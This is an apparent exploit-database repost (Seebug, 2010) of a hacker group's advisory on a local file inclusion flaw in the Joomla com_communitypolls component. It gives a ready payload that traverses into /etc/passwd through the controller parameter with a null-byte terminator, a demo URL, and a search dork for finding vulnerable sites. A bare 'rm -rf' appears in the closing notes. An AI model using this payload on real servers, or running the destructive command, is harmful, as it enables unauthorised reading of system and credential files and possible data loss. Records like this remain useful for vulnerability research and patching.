Joomla Component com_communitypolls LFI Vulnerability

2010-02-21T00:00:00
ID SSV:19161
Type seebug
Reporter Root
Modified 2010-02-21T00:00:00

Description

No description provided by source.

                                        
                                            
                                                [!]===========================================================================[!]
 
[~] Joomla Component com_communitypolls LFI Vulnerability
[~] Author  : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage    : http://www.indonesiancoder.com
[~] Date    : 16 February, 2010
 
[!]===========================================================================[!]
 
[ Software Information ]
 
[+] Vendor : http://www.corejoomla.com/
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.corejoomla.com/downloads/community-polls/24-comcommunitypollsv1-5-2.html
[+] Version : 1.5.2 maybe lower also affected
 
[!]===========================================================================[!]
 
[ Vulnerable File ]
 
http://127.0.0.1/index.php?option=com_communitypolls&controller=[INDONESIANCODER]
 
[ XpL ]
 
../../../../../../../../../../../../../../../etc/passwd%00
 
[ d3m0 ]
 
http://server/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
 
 
etc etc etc ;]
 
[!]===========================================================================[!]
 
[ Thx TO ]
 
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
 
[ NOTE ]
 
[+] Rawk !
[+] rm -rf
 
[ QUOTE ]
 
[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
[+] e0f